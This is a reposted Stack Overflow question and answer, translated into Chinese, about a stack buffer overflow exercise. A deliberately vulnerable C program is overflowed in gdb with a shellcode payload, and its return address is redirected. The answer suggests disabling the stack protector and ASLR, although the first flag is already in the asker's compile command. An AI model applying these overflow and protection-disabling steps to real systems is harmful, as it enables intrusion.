gpt4 book ai didi

c - 我如何绕过返回地址覆盖而不是重定向控制流?

转载 作者:太空狗 更新时间:2023-10-29 15:37:29 25 4
gpt4 key购买 nike

让我在这里说明问题

这是主要的

(gdb) disass main

Dump of assembler code for function main:
0x000000000040057c <+0>: push rbp
0x000000000040057d <+1>: mov rbp,rsp
0x0000000000400580 <+4>: sub rsp,0x40
0x0000000000400584 <+8>: mov DWORD PTR [rbp-0x34],edi
0x0000000000400587 <+11>: mov QWORD PTR [rbp-0x40],rsi
0x000000000040058b <+15>: mov rax,QWORD PTR [rbp-0x40]
0x000000000040058f <+19>: add rax,0x8
0x0000000000400593 <+23>: mov rdx,QWORD PTR [rax]
0x0000000000400596 <+26>: lea rax,[rbp-0x30]
0x000000000040059a <+30>: mov rsi,rdx
0x000000000040059d <+33>: mov rdi,rax
0x00000000004005a0 <+36>: call 0x400430 <strcpy@plt>
0x00000000004005a5 <+41>: mov eax,0x0
0x00000000004005aa <+46>: call 0x400566 <function>
0x00000000004005af <+51>: mov eax,0x0
0x00000000004005b4 <+56>: leave
0x00000000004005b5 <+57>: ret
End of assembler dump.

(gdb) list

#include <stdio.h>
#include <string.h>
void function(){
printf("test");
}
int main(int argc, char* argv[]) {
char a[34];
strcpy(a , argv[1]);
function();
return 0;
}

它是使用以下内容编译的:

 gcc -g -o exploitable0 vulnerable_program0.c -fno-stack-protector -z execstack

攻击者显然想要溢出数组“a”指定的缓冲区。

让我们更深入地检查当我运行漏洞时堆栈是什么样子

(gdb) run $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Starting program: /home/twister17/Documents/hacking/exploitable0 $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')

Breakpoint 1, main (argc=2, argv=0x7fffffffdcf8) at vulnerable_program0.c:9
9 function();
(gdb) i r rbp
rbp 0x7fffffffdc10 0x7fffffffdc10
(gdb) i r rsp
rsp 0x7fffffffdbd0 0x7fffffffdbd0
(gdb) x/18xw $rsp
0x7fffffffdbd0: 0xffffdcf8 0x00007fff 0x0040060d 0x00000002
0x7fffffffdbe0: 0x315915eb 0x3104b0c0 0x31c3ffdb 0xcd0fb2d2
0x7fffffffdbf0: 0xff01b080 0xe880cdcb 0xffffffe6 0x6c6c6548
0x7fffffffdc00: 0x771f2c6f 0x646c726f 0x21212121 0x21212121
0x7fffffffdc10: 0x00400566 0x00000000
(gdb)

受影响的缓冲区从 0x7fffffffdbe0 开始到 0x7fffffffdc10 结束。

shellcode 注入(inject)很顺利,为了让事情更简单,我用函数的返回地址覆盖了返回地址。也就是说,我实际上使用 0x400566 作为返回地址,所以如果一切运行顺利,它只会调用该函数并打印“test”。从程序集转储中可以清楚地看到函数“function”的地址

预期输出:“testtest”。

实际输出:test(程序已经调用了该函数)。

最佳答案

我认为您在使用 GCC 防止缓冲区溢出的 StackGuard 保护时遇到了麻烦。

尝试用

编译你的代码
-fno-stack-protector

标记以禁用对程序的保护。

假设您在 Linux 上运行它,如果您想禁用基于内核的保护,这称为地址空间随机化,您可以运行:

sysctl -w kernel.randomize_va_space=0

关于c - 我如何绕过返回地址覆盖而不是重定向控制流?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/49459841/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com